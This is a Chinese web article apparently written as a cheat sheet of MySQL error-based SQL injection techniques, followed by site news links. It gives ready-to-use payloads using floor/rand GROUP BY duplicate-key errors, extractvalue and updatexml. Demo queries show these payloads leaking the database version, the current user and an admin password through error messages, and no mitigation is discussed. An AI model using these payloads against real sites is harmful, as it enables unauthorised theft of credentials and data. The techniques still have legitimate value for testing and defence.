这篇文章主要介绍了mysql 注入报错利用方法总结的相关资料,需要的朋友可以参考下

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

举例如下:

首先进行正常查询:

mysql> select * from article where id = 1;

+—-+——-+———+

| id | title | content |

+—-+——-+———+

| 1 | test | do it |

+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘5.1.33-community-log1’ for key ‘group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。

例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));

ERROR 1062 (23000): Duplicate entry ‘admin8881’ for key ‘group_key’

2、ExtractValue

测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error: ‘\admin888’

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ‘:[email protected]

最新资讯
任正非:欧洲应改变一些商业规则 敢于把东西卖给中国

任正非:欧洲应改变一

任正非在圆桌上表示,欧洲现在应该改变一些商业规则,敢于
金山办公上市前雷军全员信:一个坚持梦想的励志故事

金山办公上市前雷军全

在金山办公上市前夕,雷军发表了至全员的一封信,他在信中
任正非:组织科学家还乡团补“洞” 大多数已补好

任正非:组织科学家还乡

任正非回答道,在“实体清单”刚出来的时候,偶然在网上看
任正非:已批评公司内部 不要过度消费国人热情

任正非:已批评公司内部

任正非对此表示,已经批评了公司内部,不要过度消费国人对
任正非:孟晚舟生活总体是好的 相信她能度过考验

任正非:孟晚舟生活总体

任正非说,我们通电话次数很少。她妈妈在陪她,她的生活总
我为什么离开百度

我为什么离开百度

“北京现在知名的互联网公司,从中层往上,一大半都是百度
最新文章
IIS 短文件/文件夹漏洞修复方法

IIS 短文件/文件夹漏

IIS短文件名泄露漏洞,IIS上实现上存在文件枚举漏洞,攻击
局域网共享安全方式之用局域网文件共享系统实现共享文件夹安全设置

局域网共享安全方式之

现在很多单位都有文件服务器,经常会共享文件让局域网用
防范黑客入侵,关闭端口封锁大门 黑客无法入侵

防范黑客入侵,关闭端口

这篇文章主要介绍了防范黑客入侵,关闭端口封锁大门 黑
电脑遭受ARP攻击,解决办法

电脑遭受ARP攻击,解决

这篇文章主要介绍了电脑遭受ARP攻击,解决办法的相关资
如何保证自己的上网安全?防范自救就靠10条

如何保证自己的上网安

虽然现在网络很发达,但对我们普通人而言,也就是10多年的
现代网络性能监控工具应具备何种技能?网络与应用程序监控

现代网络性能监控工具

大家都知道现在市场上的网络性能监控工具大有所在,这为